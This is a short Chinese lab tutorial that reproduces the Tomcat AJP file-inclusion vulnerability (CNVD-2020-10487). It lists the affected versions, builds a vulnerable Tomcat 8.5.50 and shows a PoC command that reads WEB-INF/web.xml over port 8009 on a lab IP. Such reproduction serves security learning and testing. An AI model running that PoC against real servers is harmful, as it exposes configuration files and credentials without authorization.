1. 漏洞原理
此漏洞的由于Tomcat默认开启的AJP服务(8009端口) 存在一处文件包含缺陷, 攻击者
可构造恶意的请求包进行文件包含操作, 进而读取受影响Tomcat服务器上的Web目录文件。
影响版本:
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
2. 环境搭建
1. 安装jdk
[root@localhost bin]# yum install java
2. 将apache-tomcat-8.5.50.tar.gz 解压到/opt下
[root@localhost opt]# tar xvfz apache-tomcat-8.5.50.tar.gz
3. 运行tomcat
[root@localhost opt]# cd /opt/apache-tomcat-8.5.50/bin
[root@localhost bin]# ./startup.sh
默认开启的8009如下图所示
4. 使用kali扫描目标机
3. 漏洞验证
1.POC下载
2. POC验证
root@kali:/opt/cv-tomcat# python ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 172.16.22.196 -p 8009 -f WEB-INF/web.xml
读取的是/opt/apache-tomcat-8.5.50/webapps/ROOT/WEB-INF的文件
网友评论